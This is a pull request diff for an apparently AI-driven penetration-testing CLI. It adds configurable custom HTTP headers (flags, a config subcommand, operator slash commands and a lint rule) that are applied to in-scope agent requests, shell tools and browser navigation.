### PR TITLE
feat: robust custom HTTP header support across CLI, operator, and agent tools

### DIFF
--- a/biome.jsonc
+++ b/biome.jsonc
@@ -204,15 +204,9 @@
       }
     },
     {
-      // INV-blessed-fetch: every agent tool that makes target HTTP
-      // requests MUST route through `targetFetch` from
-      // `src/core/http/targetHeaders.ts` so the resolver gets to merge
-      // session/global/credential headers. Raw `fetch` from inside an
-      // agent tool silently bypasses the header system, which is
-      // exactly the regression this rule prevents.
-      //
-      // To add a legitimate exception, factor the call out into
-      // src/core/http/* (this rule does not apply there).
+      // Agent tools must route target HTTP through `targetFetch` so the
+      // resolver applies session/credential headers. Raw fetch silently
+      // bypasses it. Factor exceptions into src/core/http/*.
       "includes": ["**/src/core/agents/offSecAgent/tools/**"],
       "linter": {
         "rules": {
@@ -221,7 +215,7 @@
               "level": "error",
               "options": {
                 "deniedGlobals": {
-                  "fetch": "Use targetFetch from src/core/http/targetHeaders.ts so session/global/credential headers are applied (INV-blessed-fetch)."
+                  "fetch": "Use targetFetch from src/core/http/targetHeaders.ts so session/global/credential headers are applied."
                 }
               }
             }

--- a/biome.jsonc
+++ b/biome.jsonc
@@ -202,6 +202,32 @@
           }
         }
       }
+    },
+    {
+      // INV-blessed-fetch: every agent tool that makes target HTTP
+      // requests MUST route through `targetFetch` from
+      // `src/core/http/targetHeaders.ts` so the resolver gets to merge
+      // session/global/credential headers. Raw `fetch` from inside an
+      // agent tool silently bypasses the header system, which is
+      // exactly the regression this rule prevents.
+      //
+      // To add a legitimate exception, factor the call out into
+      // src/core/http/* (this rule does not apply there).
+      "includes": ["**/src/core/agents/offSecAgent/tools/**"],
+      "linter": {
+        "rules": {
+          "style": {
+            "noRestrictedGlobals": {
+              "level": "error",
+              "options": {
+                "deniedGlobals": {
+                  "fetch": "Use targetFetch from src/core/http/targetHeaders.ts so session/global/credential headers are applied (INV-blessed-fetch)."
+                }
+              }
+            }
+          }
+        }
+      }
     }
   ]
 }

--- a/fern/docs/cli/pentest.mdx
+++ b/fern/docs/cli/pentest.mdx
@@ -23,6 +23,9 @@ pensar pentest --target <url> [options]
 | `--model <model>` | AI model to use (defaults to your configured provider's default) |
 | `--prompt <text\|@file>` | Guidance for the pentest agent (inline text or @filepath) |
 | `--threat-model <text\|@file>` | Threat model to guide the pentest (inline text or @filepath) |
+| `--header "Name: Value"` | Custom HTTP header sent on every in-scope request (repeatable) |
+| `--headers-from <file>` | Load headers from a JSON object or `Name: Value` file |
+| `--no-global-headers` | Skip the snapshot of `pensar config headers` defaults |
 
 ## Examples
 
@@ -50,7 +53,31 @@ pensar pentest --target https://example.com --threat-model @./threat-model.md
 
 # Combine both
 pensar pentest --target https://example.com --threat-model @./threat-model.md --prompt "Focus on critical paths"
+
+# Send a custom Authorization header on every in-scope request
+pensar pentest --target https://api.example.com \
+  --header "Authorization: Bearer $TOKEN"
+
+# Multiple headers loaded from a JSON file
+pensar pentest --target https://api.example.com --headers-from ./headers.json
 ```
+
+## Custom HTTP Headers
+
+Headers passed via `--header` (repeatable) and `--headers-from` are sent on every
+in-scope request issued by the agent — `http_request`, supported `execute_command`
+tools (curl, nuclei, ffuf, gobuster, httpx, feroxbuster, dirb, wfuzz, wpscan,
+sqlmap, nikto), and Playwright browser navigation.
+
+Headers are applied **only to in-scope hosts**. Out-of-scope hosts (CVE writeups,
+vendor docs, etc.) never see configured headers.
+
+Precedence (later wins on collision): global defaults (from `pensar config headers`)
+< `--headers-from` file < `--header` CLI flags. Pass `--no-global-headers` to skip
+the global snapshot.
+
+The `--headers-from` file can be either a JSON object (`{"X-API-Key": "abc"}`) or
+a newline-separated `Name: Value` file (with `#` comments).
 
 ## Guiding the Pentest
 

--- a/fern/docs/cli/targeted-pentest.mdx
+++ b/fern/docs/cli/targeted-pentest.mdx
@@ -20,6 +20,9 @@ pensar targeted-pentest --target <url> --objective <text> [options]
 | `--target <url>`       | **(required)** Target URL, domain, or IP address                 |
 | `--objective <text>`   | **(required, repeatable)** A specific testing objective           |
 | `--model <model>`      | AI model to use (defaults to your configured provider's default) |
+| `--header "Name: Value"` | Custom HTTP header sent on every in-scope request (repeatable) |
+| `--headers-from <file>` | Load headers from a JSON object or `Name: Value` file           |
+| `--no-global-headers`  | Skip the snapshot of `pensar config headers` defaults             |
 
 ## Examples
 
@@ -38,6 +41,11 @@ pensar targeted-pentest --target https://example.com \
 pensar targeted-pentest --target https://example.com \
   --objective "Test for XSS in search functionality" \
   --model claude-opus-4-5
+
+# Inject an API key on every in-scope request
+pensar targeted-pentest --target https://api.example.com \
+  --objective "Find IDOR in /users/:id" \
+  --header "X-API-Key: $KEY"
 ```
 
 ## Output

--- a/fern/docs/commands/config.mdx
+++ b/fern/docs/commands/config.mdx
@@ -27,6 +27,32 @@ Apex stores all configuration at `~/.pensar/config.json`. This includes:
   Most configuration is managed through dedicated commands (`/providers`, `/models`, `/themes`, `/login`). The `/config` dialog provides a unified view of your current settings.
 </Callout>
 
+## Default HTTP Headers
+
+Default custom HTTP headers can be managed from the shell via `pensar config headers`.
+These defaults are **snapshotted into every new session** at create time — existing
+sessions are not retroactively updated. To mutate a running session, use the
+`/headers` command inside the operator dashboard.
+
+| Command                                       | Description                              |
+| --------------------------------------------- | ---------------------------------------- |
+| `pensar config headers list`                  | Show defaults (sensitive values masked)  |
+| `pensar config headers list --show`           | Show defaults with values revealed       |
+| `pensar config headers add "Name: Value"`     | Add a header (errors on duplicate)       |
+| `pensar config headers set "Name: Value"`     | Add or overwrite a header                |
+| `pensar config headers remove <Name>`         | Remove a single header                   |
+| `pensar config headers clear`                 | Remove every header (asks confirmation)  |
+| `pensar config headers import <file>`         | Replace defaults from a JSON/`Name:Value` file |
+
+```bash
+pensar config headers set "X-API-Key: abc123"
+pensar config headers add "Authorization: Bearer $TOKEN"
+pensar config headers list
+```
+
+To skip the global snapshot for a single session, pass `--no-global-headers` to
+`pensar pentest`, `pensar targeted-pentest`, or `/operator`.
+
 ## Related Commands
 
 <CardGroup cols={2}>

--- a/fern/docs/commands/operator.mdx
+++ b/fern/docs/commands/operator.mdx
@@ -81,7 +81,9 @@ Toggle approval with `Option+Shift+Tab` (or `Alt+Shift+Tab` on Linux/Windows).
 | `--ports <p1,p2,...>` | Allowed ports (comma-separated)                   |
 | `--strict`            | Enable strict scope mode                          |
 | `--headers <mode>`    | Headers mode: none, default, or custom            |
-| `--header <Name:Val>` | Custom header (repeatable)                        |
+| `--header "Name: Value"` | Custom HTTP header sent on every in-scope request (repeatable) |
+| `--headers-from <file>` | Load headers from a JSON object or `Name: Value` file |
+| `--no-global-headers` | Skip the snapshot of `pensar config headers` defaults |
 | `--sandbox`           | Use isolated session directory as working directory instead of current directory |
 
 ## Keyboard Shortcuts
@@ -143,6 +145,24 @@ pensar
   alt="Operator session — agent action approval"
   style={{ borderRadius: "8px", marginTop: "16px" }}
 />
+
+## Session Headers
+
+Inside an operator session you can manage the session's custom HTTP headers
+without restarting. These headers are applied to every in-scope `http_request`,
+shell tool (curl/nuclei/etc.), and Playwright navigation.
+
+| Slash command                | Description                                  |
+| ---------------------------- | -------------------------------------------- |
+| `/headers list`              | Show headers (sensitive values masked)       |
+| `/headers list --show`       | Show headers with values revealed            |
+| `/headers add Name: Value`   | Add a header (errors if `Name` already set)  |
+| `/headers set Name: Value`   | Add or overwrite a header                    |
+| `/headers remove Name`       | Remove a single header                       |
+| `/headers clear`             | Remove every header                          |
+
+Mutations take effect on the next tool call. Per-request `headers` passed to
+`http_request` still win over session-level headers for one-off overrides.
 
 ## Operator Skills
 

--- a/fern/docs/commands/pentest.mdx
+++ b/fern/docs/commands/pentest.mdx
@@ -132,7 +132,9 @@ You can bypass the wizard entirely by passing flags:
 | `--ports <p1,p2,...>` | Allowed ports (comma-separated)        |
 | `--strict`            | Enable strict scope mode               |
 | `--headers <mode>`    | Headers mode: none, default, or custom |
-| `--header <Name:Val>` | Custom header (repeatable)             |
+| `--header "Name: Value"` | Custom HTTP header sent on every in-scope request (repeatable) |
+| `--headers-from <file>` | Load headers from a JSON object or `Name: Value` file |
+| `--no-global-headers` | Skip the snapshot of `pensar config headers` defaults |
 | `--prompt <text\|@file>` | Guidance for the pentest agent (inline text or @filepath) |
 | `--threat-model <text\|@file>` | Threat model to guide the pentest (inline text or @filepath) |
 

--- a/scripts/attack-surface.ts
+++ b/scripts/attack-surface.ts
@@ -72,10 +72,14 @@ async function runAttackSurface(options: AttackSurfaceOptions): Promise<void> {
   try {
     // Build session config
     const sessionConfig = {
-      offensiveHeaders: {
-        mode: headerMode,
-        headers: headerMode === "custom" ? customHeaders : undefined,
-      },
+      // "default" omits `headers` so `sessions.create` seeds the global
+      // default (pensar-apex User-Agent). "none" passes an explicit empty
+      // record to disable that. "custom" supplies the caller's headers.
+      ...(headerMode === "custom"
+        ? { headers: customHeaders ?? {} }
+        : headerMode === "none"
+          ? { headers: {} }
+          : {}),
       ...(strictScope && {
         scopeConstraints: {
           strictScope: true,

--- a/scripts/attack-surface.ts
+++ b/scripts/attack-surface.ts
@@ -70,11 +70,8 @@ async function runAttackSurface(options: AttackSurfaceOptions): Promise<void> {
   console.log();
 
   try {
-    // Build session config
+    // "default" omits headers so sessions.create snapshots the global default.
     const sessionConfig = {
-      // "default" omits `headers` so `sessions.create` seeds the global
-      // default (pensar-apex User-Agent). "none" passes an explicit empty
-      // record to disable that. "custom" supplies the caller's headers.
       ...(headerMode === "custom"
         ? { headers: customHeaders ?? {} }
         : headerMode === "none"

--- a/scripts/test-sandbox-playwright.ts
+++ b/scripts/test-sandbox-playwright.ts
@@ -268,7 +268,6 @@ async function main() {
         time: { created: Date.now(), updated: Date.now() },
         config: {
           mode: "auto" as const,
-          offensiveHeaders: { mode: "default" as const, headers: {} },
           outcomeGuidance: "test",
         },
         rootPath: testDir,

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -89,14 +89,8 @@ async function createInstrumentedBus(
   return { bus, cleanup: async () => wandbCleanup?.() };
 }
 
-/**
- * Resolve `--header K:V` (repeatable), `--headers-from <file>`, and
- * `--no-global-headers` into the session-shape `headers` map.
- *
- * Precedence: global defaults (unless `--no-global-headers`) < file < CLI flags.
- * Returns `undefined` to mean "use sessions.create defaults (snapshot
- * global)" so the caller can pass it straight into `sessions.create`.
- */
+// Returns the merged headers (global defaults < file < CLI flags), or
+// `undefined` to let `sessions.create` snapshot the global defaults.
 async function resolveCliHeaders(): Promise<
   Record<string, string> | undefined
 > {

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -90,6 +90,64 @@ async function createInstrumentedBus(
 }
 
 /**
+ * Resolve `--header K:V` (repeatable), `--headers-from <file>`, and
+ * `--no-global-headers` into the session-shape `headers` map.
+ *
+ * Precedence: global defaults (unless `--no-global-headers`) < file < CLI flags.
+ * Returns `undefined` to mean "use sessions.create defaults (snapshot
+ * global)" so the caller can pass it straight into `sessions.create`.
+ */
+async function resolveCliHeaders(): Promise<
+  Record<string, string> | undefined
+> {
+  const headerArgs = getAllArgs("--header");
+  const headersFromArg = getArg("--headers-from");
+  const noGlobal = hasFlag("--no-global-headers");
+
+  if (headerArgs.length === 0 && !headersFromArg && !noGlobal) {
+    return undefined;
+  }
+
+  const { parseHeaderLine, parseHeadersFromFile, formatParseError } =
+    await import("./core/http/parse");
+  const merged: Record<string, string> = {};
+
+  if (!noGlobal) {
+    const { config: appConfig } = await import("./core/config");
+    const cfg = await appConfig.get();
+    if (cfg.defaultHeaders) {
+      Object.assign(merged, cfg.defaultHeaders);
+    }
+  }
+
+  if (headersFromArg) {
+    const parsed = await parseHeadersFromFile(headersFromArg);
+    if (!parsed.ok) {
+      for (const err of parsed.error) {
+        console.error(`--headers-from error:\n${formatParseError(err)}`);
+      }
+      process.exit(1);
+    }
+    for (const entry of parsed.value) {
+      merged[entry.name] = entry.value;
+    }
+  }
+
+  for (const arg of headerArgs) {
+    const parsed = parseHeaderLine(arg);
+    if (!parsed.ok) {
+      console.error(
+        `--header "${arg}" rejected:\n${formatParseError(parsed.error)}`,
+      );
+      process.exit(1);
+    }
+    merged[parsed.value.name] = parsed.value.value;
+  }
+
+  return merged;
+}
+
+/**
  * Resolve the AI model from --model flag or configured provider default.
  * Errors clearly if no provider is configured instead of silently picking
  * a model that will fail at the API call level.
@@ -139,6 +197,7 @@ Usage:
   pensar issues                       List and manage security issues
   pensar fixes                        View security fixes
   pensar logs                         View agent execution logs
+  pensar config headers               Manage global default HTTP headers
   pensar upgrade                      Update pensar to the latest version
   pensar doctor                       Check dependencies and install missing tools
   pensar help                         Show this help message
@@ -149,6 +208,9 @@ operator options (-p):
   -s, --system <text|@file>  Override the default system prompt
   --target <url>             Target URL / domain / IP
   --model <model>            AI model (default: auto-selected from configured provider)
+  --header "Name: Value"     Custom HTTP header (repeatable)
+  --headers-from <file>      Load headers from a JSON object or Name:Value file
+  --no-global-headers        Skip the global defaultHeaders snapshot
 
 pentest options:
   --target <url>           (required) Target URL / domain / IP
@@ -159,11 +221,17 @@ pentest options:
   --task-driven             Enable task-driven architecture (experimental)
   --prompt <text|@file>    Guidance for the pentest agent (inline text or @filepath)
   --threat-model <text|@file>  Threat model to guide the pentest (inline or @filepath)
+  --header "Name: Value"   Custom HTTP header (repeatable)
+  --headers-from <file>    Load headers from a JSON object or Name:Value file
+  --no-global-headers      Skip the global defaultHeaders snapshot
 
 targeted-pentest options:
   --target <url>          (required) Target URL / domain / IP
   --objective <text>      (required, repeatable) Testing objective
   --model <model>         AI model (default: auto-selected from configured provider)
+  --header "Name: Value"  Custom HTTP header (repeatable)
+  --headers-from <file>   Load headers from a JSON object or Name:Value file
+  --no-global-headers     Skip the global defaultHeaders snapshot
 
 threat-model options:
   --output, -o <path>  Output file path (default: ./threat-model.md)
@@ -207,6 +275,7 @@ async function runPentest() {
 
   const pensarConfig = await appConfig.get();
   const model = await resolveCliModel();
+  const headers = await resolveCliHeaders();
   const { exfilMode, warning: modeWarning } = resolvePentestMode(mode);
 
   if (modeWarning) {
@@ -218,7 +287,7 @@ async function runPentest() {
 PENTEST ORCHESTRATION
 ${sep}
 Target:  ${target}${cwd ? `\nCwd:     ${cwd} (whitebox)` : ""}${exfilMode ? "\nMode:    exfil" : ""}
-Model:   ${model}${enableThinking ? "\nThinking: enabled" : ""}${taskDriven ? "\nTask-driven: enabled" : ""}
+Model:   ${model}${enableThinking ? "\nThinking: enabled" : ""}${taskDriven ? "\nTask-driven: enabled" : ""}${headers ? `\nHeaders: ${Object.keys(headers).length} configured` : ""}
 `);
 
   const session = await sessions.create({
@@ -229,6 +298,7 @@ Model:   ${model}${enableThinking ? "\nThinking: enabled" : ""}${taskDriven ? "\
       ...(exfilMode ? { exfilMode: true } : {}),
       ...(prompt ? { prompt } : {}),
       ...(taskDriven ? { taskDriven: true } : {}),
+      ...(headers !== undefined ? { headers } : {}),
     },
   });
 
@@ -294,9 +364,11 @@ Objectives:
 ${objectivesList}
 `);
 
+  const headers = await resolveCliHeaders();
   const session = await sessions.create({
     name: "Targeted Pentest",
     targets: [target],
+    ...(headers !== undefined ? { config: { headers } } : {}),
   });
 
   const { bus: targetedBus, cleanup: wandbCleanup } =
@@ -406,6 +478,7 @@ ${sep}
 Model:   ${model}${target ? `\nTarget:  ${target}` : ""}
 ${sep}\n`);
 
+  const headers = await resolveCliHeaders();
   const session = await sessions.create({
     name: "Operator Session",
     targets: target ? [target] : [],
@@ -417,6 +490,7 @@ ${sep}\n`);
         requireApproval: false,
         enableSuggestions: false,
       },
+      ...(headers !== undefined ? { headers } : {}),
     },
   });
 
@@ -534,6 +608,9 @@ if (hasFlag("-p") || command === "--prompt") {
 } else if (command === "logs") {
   process.argv = [process.argv[0], process.argv[1], ...args.slice(1)];
   await import("./cli/logs");
+} else if (command === "config") {
+  process.argv = [process.argv[0], process.argv[1], ...args.slice(1)];
+  await import("./cli/config");
 } else if (command === "threat-model") {
   await runThreatModel();
 } else if (command === "doctor") {

--- a/src/cli/config.ts
+++ b/src/cli/config.ts
@@ -1,20 +1,8 @@
 #!/usr/bin/env bun
 
-/**
- * `pensar config headers` — Manage the global default HTTP headers
- * stored in `~/.pensar/config.json`. Changes here are snapshotted into
- * every NEW session at create time (INV-snapshot-stability) but do NOT
- * retroactively affect already-running sessions.
- *
- * Subcommands:
- *   list                            Show current defaults (values masked)
- *   list --show                     Show current defaults (values revealed)
- *   add "Name: Value"               Add a header (errors on duplicate)
- *   set "Name: Value"               Add or overwrite a header
- *   remove <Name>                   Remove a single header
- *   clear                           Remove every header (asks for confirmation)
- *   import <file>                   Replace defaults from a JSON/Name:Value file
- */
+// `pensar config headers` — manage global default HTTP headers in
+// ~/.pensar/config.json. Snapshotted into new sessions at create time;
+// existing sessions are not retroactively updated.
 
 import { config } from "../core/config";
 import {

--- a/src/cli/config.ts
+++ b/src/cli/config.ts
@@ -1,0 +1,221 @@
+#!/usr/bin/env bun
+
+/**
+ * `pensar config headers` — Manage the global default HTTP headers
+ * stored in `~/.pensar/config.json`. Changes here are snapshotted into
+ * every NEW session at create time (INV-snapshot-stability) but do NOT
+ * retroactively affect already-running sessions.
+ *
+ * Subcommands:
+ *   list                            Show current defaults (values masked)
+ *   list --show                     Show current defaults (values revealed)
+ *   add "Name: Value"               Add a header (errors on duplicate)
+ *   set "Name: Value"               Add or overwrite a header
+ *   remove <Name>                   Remove a single header
+ *   clear                           Remove every header (asks for confirmation)
+ *   import <file>                   Replace defaults from a JSON/Name:Value file
+ */
+
+import { config } from "../core/config";
+import {
+  formatParseError,
+  parseHeaderLine,
+  parseHeadersFromFile,
+} from "../core/http/parse";
+import {
+  type HeaderRecord,
+  isSensitiveHeaderName,
+  renderHeaderValue,
+} from "../core/http/types";
+
+function showHelp(): void {
+  console.log(`pensar config headers — Manage global default HTTP headers
+
+Usage:
+  pensar config headers list [--show]
+  pensar config headers add    "Name: Value"
+  pensar config headers set    "Name: Value"
+  pensar config headers remove <Name>
+  pensar config headers clear  [--yes]
+  pensar config headers import <file>
+
+Notes:
+  - Stored in ~/.pensar/config.json under \`defaultHeaders\`.
+  - New sessions snapshot these at create time. Existing sessions are
+    not retroactively updated — use the operator /headers command or
+    edit per-session config directly.
+  - Values containing 'authorization', 'cookie', 'token', 'key',
+    'secret', or 'password' are masked by default. Pass --show to
+    reveal them in 'list'.`);
+}
+
+function printHeaders(headers: HeaderRecord, showSecrets: boolean): void {
+  const entries = Object.entries(headers);
+  if (entries.length === 0) {
+    console.log("(no default headers configured)");
+    return;
+  }
+  for (const [name, value] of entries) {
+    const sensitive = isSensitiveHeaderName(name) ? "*" : " ";
+    console.log(
+      `${sensitive} ${name}: ${renderHeaderValue(name, value, showSecrets)}`,
+    );
+  }
+}
+
+async function loadDefaults(): Promise<HeaderRecord> {
+  const cfg = await config.get();
+  return cfg.defaultHeaders ? { ...cfg.defaultHeaders } : {};
+}
+
+async function saveDefaults(headers: HeaderRecord): Promise<void> {
+  await config.update({
+    defaultHeaders: headers,
+    defaultHeadersUpdatedAt: new Date().toISOString(),
+  });
+}
+
+async function cmdList(args: string[]): Promise<void> {
+  const showSecrets = args.includes("--show");
+  const headers = await loadDefaults();
+  printHeaders(headers, showSecrets);
+}
+
+async function cmdAdd(args: string[], allowOverwrite: boolean): Promise<void> {
+  const value = args[0];
+  if (!value) {
+    console.error('Error: expected "Name: Value" argument');
+    process.exit(1);
+  }
+  const parsed = parseHeaderLine(value);
+  if (!parsed.ok) {
+    console.error(`Invalid header:\n${formatParseError(parsed.error)}`);
+    process.exit(1);
+  }
+  const headers = await loadDefaults();
+  const canonical = Object.keys(headers).find(
+    (k) => k.toLowerCase() === parsed.value.name.toLowerCase(),
+  );
+  if (canonical && !allowOverwrite) {
+    console.error(
+      `Header "${canonical}" already exists. Use \`pensar config headers set\` to overwrite.`,
+    );
+    process.exit(1);
+  }
+  if (canonical && canonical !== parsed.value.name) {
+    delete headers[canonical];
+  }
+  headers[parsed.value.name] = parsed.value.value;
+  await saveDefaults(headers);
+  console.log(`Updated default header: ${parsed.value.name}`);
+}
+
+async function cmdRemove(args: string[]): Promise<void> {
+  const name = args[0];
+  if (!name) {
+    console.error("Error: expected <Name> argument");
+    process.exit(1);
+  }
+  const headers = await loadDefaults();
+  const canonical = Object.keys(headers).find(
+    (k) => k.toLowerCase() === name.toLowerCase(),
+  );
+  if (!canonical) {
+    console.error(`No default header named "${name}".`);
+    process.exit(1);
+  }
+  delete headers[canonical];
+  await saveDefaults(headers);
+  console.log(`Removed default header: ${canonical}`);
+}
+
+async function cmdClear(args: string[]): Promise<void> {
+  const confirmed = args.includes("--yes") || args.includes("-y");
+  if (!confirmed) {
+    console.error(
+      "Refusing to clear without confirmation. Pass --yes to proceed.",
+    );
+    process.exit(1);
+  }
+  await saveDefaults({});
+  console.log("Cleared all default headers.");
+}
+
+async function cmdImport(args: string[]): Promise<void> {
+  const file = args[0];
+  if (!file) {
+    console.error("Error: expected <file> argument");
+    process.exit(1);
+  }
+  const parsed = await parseHeadersFromFile(file);
+  if (!parsed.ok) {
+    for (const err of parsed.error) {
+      console.error(`Import error:\n${formatParseError(err)}`);
+    }
+    process.exit(1);
+  }
+  const next: HeaderRecord = {};
+  for (const entry of parsed.value) {
+    next[entry.name] = entry.value;
+  }
+  await saveDefaults(next);
+  console.log(
+    `Replaced default headers with ${parsed.value.length} entries from ${file}.`,
+  );
+}
+
+async function main(): Promise<void> {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0 || args[0] === "--help" || args[0] === "-h") {
+    showHelp();
+    return;
+  }
+
+  const sub = args[0];
+  if (sub !== "headers") {
+    console.error(`Unknown 'pensar config' subcommand: ${sub}`);
+    console.error("Only 'headers' is supported today.");
+    process.exit(1);
+  }
+
+  const op = args[1];
+  const rest = args.slice(2);
+
+  switch (op) {
+    case undefined:
+    case "list":
+      await cmdList(rest);
+      break;
+    case "add":
+      await cmdAdd(rest, /* allowOverwrite */ false);
+      break;
+    case "set":
+      await cmdAdd(rest, /* allowOverwrite */ true);
+      break;
+    case "remove":
+    case "rm":
+    case "delete":
+      await cmdRemove(rest);
+      break;
+    case "clear":
+      await cmdClear(rest);
+      break;
+    case "import":
+      await cmdImport(rest);
+      break;
+    case "--help":
+    case "-h":
+      showHelp();
+      break;
+    default:
+      console.error(`Unknown headers operation: ${op}`);
+      showHelp();
+      process.exit(1);
+  }
+}
+
+main().catch((err) => {
+  console.error(`\nError: ${err instanceof Error ? err.message : String(err)}`);
+  process.exit(1);
+});

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -11,12 +11,12 @@ import { writeFile } from "fs/promises";
 import { join } from "path";
 import { streamResponse } from "../../ai";
 import { AgentEventBus } from "../../eventBus";
-import type { ApprovalGate } from "../../operator";
-import { ApprovalDeniedError } from "../../operator";
 import {
   resolveEffectiveHeaders,
   stripBrowserManagedHeaders,
 } from "../../http/targetHeaders";
+import type { ApprovalGate } from "../../operator";
+import { ApprovalDeniedError } from "../../operator";
 import { create as createSession, type SessionInfo } from "../../session";
 import { detectOSAndEnhancePrompt } from "../specialized/utils";
 import { buildBaseSystemPrompt, buildSessionWorkspaceSection } from "./prompt";

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -13,7 +13,10 @@ import { streamResponse } from "../../ai";
 import { AgentEventBus } from "../../eventBus";
 import type { ApprovalGate } from "../../operator";
 import { ApprovalDeniedError } from "../../operator";
-import { resolveEffectiveHeaders } from "../../http/targetHeaders";
+import {
+  resolveEffectiveHeaders,
+  stripBrowserManagedHeaders,
+} from "../../http/targetHeaders";
 import { create as createSession, type SessionInfo } from "../../session";
 import { detectOSAndEnhancePrompt } from "../specialized/utils";
 import { buildBaseSystemPrompt, buildSessionWorkspaceSection } from "./prompt";
@@ -186,7 +189,9 @@ export class OffensiveSecurityAgent<TResult = void> {
         : input.session.config?.headers;
       this.browserSession =
         input.browserSession ??
-        new PlaywrightMcpSession({ extraHttpHeaders: sessionHeaders });
+        new PlaywrightMcpSession({
+          extraHttpHeaders: stripBrowserManagedHeaders(sessionHeaders),
+        });
     }
 
     // -- Step trace (trace.jsonl) ---------------------------------------------

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -183,12 +183,7 @@ export class OffensiveSecurityAgent<TResult = void> {
       const sessionHeaders = input.session.config?.headers;
       this.browserSession =
         input.browserSession ??
-        new PlaywrightMcpSession(
-          undefined,
-          undefined,
-          undefined,
-          sessionHeaders,
-        );
+        new PlaywrightMcpSession({ extraHttpHeaders: sessionHeaders });
     }
 
     // -- Step trace (trace.jsonl) ---------------------------------------------

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -13,6 +13,7 @@ import { streamResponse } from "../../ai";
 import { AgentEventBus } from "../../eventBus";
 import type { ApprovalGate } from "../../operator";
 import { ApprovalDeniedError } from "../../operator";
+import { resolveEffectiveHeaders } from "../../http/targetHeaders";
 import { create as createSession, type SessionInfo } from "../../session";
 import { detectOSAndEnhancePrompt } from "../specialized/utils";
 import { buildBaseSystemPrompt, buildSessionWorkspaceSection } from "./prompt";
@@ -176,11 +177,13 @@ export class OffensiveSecurityAgent<TResult = void> {
     // share browser state via the sandbox's per-sandbox Playwright user-data
     // dir, so they don't need a session object on the host.
     if (!input.sandbox) {
-      // Pass the session's resolved headers into the browser session so
-      // every Chromium request carries them (INV-browser-snapshot).
-      // Mutations to session.config.headers after this point do NOT
-      // propagate to the live browser — the user must restart it.
-      const sessionHeaders = input.session.config?.headers;
+      // Resolve session + credential layer headers into the browser
+      // session so every Chromium request carries them
+      // (INV-browser-snapshot, INV-single-source). Mutations after
+      // this point do NOT propagate — the user must restart the browser.
+      const sessionHeaders = input.target
+        ? resolveEffectiveHeaders(input.session, input.target)
+        : input.session.config?.headers;
       this.browserSession =
         input.browserSession ??
         new PlaywrightMcpSession({ extraHttpHeaders: sessionHeaders });

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -176,7 +176,19 @@ export class OffensiveSecurityAgent<TResult = void> {
     // share browser state via the sandbox's per-sandbox Playwright user-data
     // dir, so they don't need a session object on the host.
     if (!input.sandbox) {
-      this.browserSession = input.browserSession ?? new PlaywrightMcpSession();
+      // Pass the session's resolved headers into the browser session so
+      // every Chromium request carries them (INV-browser-snapshot).
+      // Mutations to session.config.headers after this point do NOT
+      // propagate to the live browser — the user must restart it.
+      const sessionHeaders = input.session.config?.headers;
+      this.browserSession =
+        input.browserSession ??
+        new PlaywrightMcpSession(
+          undefined,
+          undefined,
+          undefined,
+          sessionHeaders,
+        );
     }
 
     // -- Step trace (trace.jsonl) ---------------------------------------------

--- a/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
+++ b/src/core/agents/offSecAgent/offensiveSecurityAgent.ts
@@ -180,10 +180,8 @@ export class OffensiveSecurityAgent<TResult = void> {
     // share browser state via the sandbox's per-sandbox Playwright user-data
     // dir, so they don't need a session object on the host.
     if (!input.sandbox) {
-      // Resolve session + credential layer headers into the browser
-      // session so every Chromium request carries them
-      // (INV-browser-snapshot, INV-single-source). Mutations after
-      // this point do NOT propagate — the user must restart the browser.
+      // Snapshot resolved headers into the browser session. Later mutations
+      // require a browser restart to take effect.
       const sessionHeaders = input.target
         ? resolveEffectiveHeaders(input.session, input.target)
         : input.session.config?.headers;

--- a/src/core/agents/offSecAgent/tools/authenticateSession.ts
+++ b/src/core/agents/offSecAgent/tools/authenticateSession.ts
@@ -3,6 +3,7 @@ import { writeFileSync } from "fs";
 import { join } from "path";
 import { z } from "zod";
 import { targetFetch } from "../../../http/targetHeaders";
+import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 /**
@@ -146,7 +147,11 @@ or provide username/password directly.`,
           authRequest.headers = { Authorization: `Basic ${authHeader}` };
         }
 
-        const result = await targetFetch(ctx.session, loginUrl, authRequest);
+        const result = await targetFetch(
+          resolverSessionFromCtx(ctx),
+          loginUrl,
+          authRequest,
+        );
 
         const setCookieHeader = result.headers?.getSetCookie() || [];
         const sessionCookies = Array.isArray(setCookieHeader)

--- a/src/core/agents/offSecAgent/tools/authenticateSession.ts
+++ b/src/core/agents/offSecAgent/tools/authenticateSession.ts
@@ -2,6 +2,7 @@ import { tool } from "ai";
 import { writeFileSync } from "fs";
 import { join } from "path";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import type { ToolContext } from "./types";
 
 /**
@@ -145,7 +146,7 @@ or provide username/password directly.`,
           authRequest.headers = { Authorization: `Basic ${authHeader}` };
         }
 
-        const result = await fetch(loginUrl, authRequest);
+        const result = await targetFetch(ctx.session, loginUrl, authRequest);
 
         const setCookieHeader = result.headers?.getSetCookie() || [];
         const sessionCookies = Array.isArray(setCookieHeader)

--- a/src/core/agents/offSecAgent/tools/crawlAuthenticated.ts
+++ b/src/core/agents/offSecAgent/tools/crawlAuthenticated.ts
@@ -1,5 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import {
   type EndpointInfo,
   extractJavascriptEndpoints,
@@ -67,7 +68,7 @@ export function crawlAuthenticated(ctx: ToolContext) {
           visited.add(url);
 
           try {
-            const pageResult = await fetch(url, {
+            const pageResult = await targetFetch(ctx.session, url, {
               method: "GET",
               headers: { cookie: sessionCookie },
             });

--- a/src/core/agents/offSecAgent/tools/crawlAuthenticated.ts
